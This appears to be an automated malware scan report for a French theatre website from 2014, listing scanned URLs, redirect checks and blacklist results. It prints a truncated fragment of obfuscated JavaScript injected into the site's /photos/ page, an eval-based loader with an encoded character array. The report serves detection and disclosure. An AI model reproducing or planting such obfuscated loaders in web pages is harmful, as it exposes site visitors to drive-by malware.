Scanned pages/files
Request | Server response | Status |
http://theatreduroirene.com/ | 200 OK Content-Length: 71324 Content-Type: text/html | clean |
http://theatreduroirene.com/photos/ | 200 OK Content-Length: 8381 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k
Antivirus reports:
http://theatreduroirene.com/test404page.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1405375200 | 200 OK Content-Length: 58303 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1404770400 | 200 OK Content-Length: 58223 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1404165600 | 200 OK Content-Length: 55122 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1403560800 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1402956000 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1402351200 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1401746400 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1401141600 | 200 OK Content-Length: 53887 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1400536800 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1399932000 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1399327200 | 200 OK Content-Length: 53886 Content-Type: text/html | clean |
http://theatreduroirene.com/index.php?deb=1398722400 | 200 OK Content-Length: 53894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theatreduroirene.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 10:24:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny16
Second query (visit from search engine):
GET / HTTP/1.1
Host: theatreduroirene.com
Referer: http://www.google.com/search?q=theatreduroirene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theatreduroirene.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://theatreduroirene.com/
Result: theatreduroirene.com is not infected or malware details are not published yet.